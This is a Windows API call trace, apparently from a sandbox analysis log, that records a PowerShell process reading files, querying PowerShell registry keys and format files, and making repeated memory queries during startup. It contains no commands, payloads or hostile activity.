	[0430.106] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.106] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.106] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.106] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.107] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.107] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.107] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.107] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.108] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.108] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.108] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.110] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.111] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.111] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.111] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.111] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.111] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.112] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.112] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.112] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1b4, lpOverlapped=0x0) returned 1
	[0430.112] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x0, lpOverlapped=0x0) returned 1
	[0430.112] CloseHandle (hObject=0x30c) returned 1
	[0430.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0430.113] SetErrorMode (uMode=0x1) returned 0x1
	[0430.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1a0 | out: lpFileInformation=0x24d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0430.113] SetErrorMode (uMode=0x1) returned 0x1
	[0430.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0430.113] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d288 | out: phkResult=0x24d288*=0x30c) returned 0x0
	[0430.113] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d20c, lpData=0x0, lpcbData=0x24d208*=0x0 | out: lpType=0x24d20c*=0x1, lpData=0x0, lpcbData=0x24d208*=0x56) returned 0x0
	[0430.113] CoTaskMemAlloc (cb=0x5a) returned 0x46a2c0
	[0430.113] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d1dc, lpData=0x46a2c0, lpcbData=0x24d1d8*=0x56 | out: lpType=0x24d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d1d8*=0x56) returned 0x0
	[0430.114] CoTaskMemFree (pv=0x46a2c0) 
	[0430.114] RegCloseKey (hKey=0x30c) returned 0x0
	[0430.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0430.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0430.321] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.323] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.323] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.323] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.324] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.324] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.324] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.324] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.332] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.332] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.332] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.332] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.332] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.332] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.333] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.333] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.337] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.342] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.342] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.342] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.342] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.343] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.343] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.343] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.343] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.343] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.343] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.344] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.344] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.344] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.345] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.346] VirtualQuery (in: lpAddress=0x24bf80, lpBuffer=0x24ce40, dwLength=0x30 | out: lpBuffer=0x24ce40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.346] VirtualQuery (in: lpAddress=0x24bf80, lpBuffer=0x24ce40, dwLength=0x30 | out: lpBuffer=0x24ce40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.346] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.347] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.439] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.439] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.439] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.440] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0430.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.440] CoTaskMemFree (pv=0x1b82df50) 
	[0430.441] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.442] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.442] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.443] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.443] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.443] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.443] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.444] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.444] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.445] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d428 | out: phkResult=0x24d428*=0x30c) returned 0x0
	[0430.445] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d43c, lpData=0x0, lpcbData=0x24d438*=0x0 | out: lpType=0x24d43c*=0x1, lpData=0x0, lpcbData=0x24d438*=0x74) returned 0x0
	[0430.445] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d3ac, lpData=0x0, lpcbData=0x24d3a8*=0x0 | out: lpType=0x24d3ac*=0x1, lpData=0x0, lpcbData=0x24d3a8*=0x74) returned 0x0
	[0430.445] CoTaskMemAlloc (cb=0x78) returned 0x421f00
	[0430.445] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d37c, lpData=0x421f00, lpcbData=0x24d378*=0x74 | out: lpType=0x24d37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d378*=0x74) returned 0x0
	[0430.445] CoTaskMemFree (pv=0x421f00) 
	[0430.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0430.445] SetErrorMode (uMode=0x1) returned 0x1
	[0430.445] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0430.445] SetErrorMode (uMode=0x1) returned 0x1
	[0430.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.446] SetErrorMode (uMode=0x1) returned 0x1
	[0430.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0430.446] SetErrorMode (uMode=0x1) returned 0x1
